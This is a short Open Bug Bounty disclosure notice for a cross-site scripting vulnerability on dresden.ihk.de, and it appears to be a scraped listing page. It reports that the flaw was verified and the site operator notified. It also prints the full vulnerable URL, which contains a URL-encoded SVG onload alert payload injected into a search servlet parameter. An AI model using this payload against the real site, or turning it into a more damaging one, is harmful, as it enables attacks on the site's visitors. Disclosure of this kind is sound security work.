dresden.ihk.de Cross Site Scripting vulnerability OBB-3552934

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

dresden.ihk.de XSS vulnerability

Vulnerable URL: http://www.dresden.ihk.de/servlet/suche?refknotenid=30779=%22%3Eblub%3CsvG%2Fonload%3Dalert%28%2FOPENBUGBOUNTY%2F%29%3E=suchen=gewichtung=jaitem=1=20color=darkbluepfadkuerzen=20=nein=ja=ja=ja=nein=ja=ja=ja=ja=ja=neinhub=jafile=jatext=ja=true=300=jaduvas=3 Details: Description| Val...